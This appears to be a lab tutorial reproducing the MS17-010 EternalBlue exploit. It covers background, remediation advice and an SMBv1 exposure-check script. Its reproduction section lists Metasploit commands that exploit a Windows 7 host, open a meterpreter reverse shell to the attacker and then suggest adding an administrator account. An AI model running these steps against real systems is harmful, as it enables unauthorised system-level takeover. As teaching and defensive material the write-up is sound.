MS17-010 EternalBlue vulnerability reproduction
0x00 Vulnerability introduction
EternalBlue dates to the evening of April 14, 2017. "EternalBlue" exploits an SMB vulnerability in Windows systems to obtain the highest system privileges.
On May 12, 2017, criminals adapted "EternalBlue" to produce the WannaCry ransomware, which hit multiple university campus networks, large enterprise intranets and private government networks, extorting high ransoms to decrypt and restore files.
0x01 Vulnerability principle
EternalBlue is an exploit from the Equation Group's exploitation framework that attacks the SMB service. The underlying vulnerability allows an attacker to execute arbitrary code on the target system.
0x02 Affected versions
Currently known affected versions of Windows include, but are not limited to:
Windows NT,
Windows 2000,
Windows XP,
Windows 2003,
Windows Vista,
Windows 7,
Windows 8,
Windows 2008,
Windows 2008 R2,
Windows Server 2012 SP0.
0x03 Vulnerability remediation
Microsoft released the MS17-010 patch on March 14, 2017, which fixes the vulnerability used by the "EternalBlue" attack; be sure to install Windows system patches promptly. Do not casually open attachments with doc, rtf and similar suffixes. If machines on the intranet share the same account and password, change the passwords as soon as possible. For computers that are currently powered off, make sure the password change is complete and the patch is installed before connecting them to the network. You can also download an "EternalBlue" vulnerability repair tool to fix the vulnerability.
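As a follow-up check after remediation, the added example below (not part of the original page) audits whether a host still accepts the SMBv1 dialect, the protocol version whose server code MS17-010 patches. A result of `smb1-enabled` shows only that SMBv1 is still exposed, not that the patch is missing. The function names and result labels are assumptions made for this example.

```python
import socket
import struct
import sys

DIALECT = b"\x02NT LM 0.12\x00"  # the only dialect offered: SMBv1


def build_negotiate() -> bytes:
    """SMB1 SMB_COM_NEGOTIATE (0x72) request inside a NetBIOS session header."""
    header = struct.pack(
        "<4sBIBHH8sHHHHH",
        b"\xffSMB", 0x72,       # protocol id, command
        0,                      # NT status
        0x18, 0xC801,           # flags, flags2
        0, b"\x00" * 8, 0,      # PID high, signature, reserved
        0xFFFF, 0x1234, 0, 1,   # TID, PID (arbitrary), UID, MID
    )
    body = struct.pack("<BH", 0, len(DIALECT)) + DIALECT  # WordCount=0, ByteCount
    smb = header + body
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def classify_response(data: bytes) -> str:
    """Interpret the server's reply to build_negotiate()."""
    smb = data[4:]  # skip the 4-byte NetBIOS session header
    if len(smb) < 4:
        return "smb1-refused"   # server closed the session without answering
    if smb[:4] == b"\xfeSMB":
        return "smb2-only"
    if smb[:4] != b"\xffSMB" or len(smb) < 35 or smb[4] != 0x72:
        return "unknown"
    status = struct.unpack_from("<I", smb, 5)[0]
    word_count = smb[32]
    dialect_index = struct.unpack_from("<H", smb, 33)[0]
    if status == 0 and word_count >= 1 and dialect_index != 0xFFFF:
        return "smb1-enabled"   # server selected the SMBv1 dialect we offered
    return "smb1-refused"


def probe(host: str, port: int = 445, timeout: float = 3.0) -> str:
    """Send one negotiate request and classify the answer."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_negotiate())
            return classify_response(s.recv(1024))
    except OSError:
        return "unreachable-or-reset"


if __name__ == "__main__":
    for target in sys.argv[1:]:  # hosts you administer, given on the command line
        print(target, probe(target))
```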
0x04 Test environment
Attacker: Kali-Linux-2019.4-vmware-amd64 (IP: 192.168.139.153)
Target: Windows 7 x64 (IP: 192.168.139.140)
0x05 Vulnerability reproduction
[msfconsole] - start msf
[search ms17_010] - list the matching modules
[use auxiliary/scanner/smb/smb_ms17_010] - select the scanner module that checks whether hosts are vulnerable
[set rhosts 192.168.139.140] - set the IP address of the host to scan
[exploit] - run the scan
[use exploit/windows/smb/ms17_010_eternalblue] - select the attack module
[show options] - view the parameters that need to be set
[set rhosts 192.168.139.140] - set the IP address of the attacked host
[set lhost 192.168.139.153] - set the IP address of the attacker
[set threads 512] - set the number of threads
[set payload windows/x64/meterpreter/reverse_tcp] - set the reverse-connection payload
[exploit] - begin the attack
[shell]
[whoami]
[systeminfo]
[ipconfig]
After that, you can add a user, change its password, and add it to the administrators group.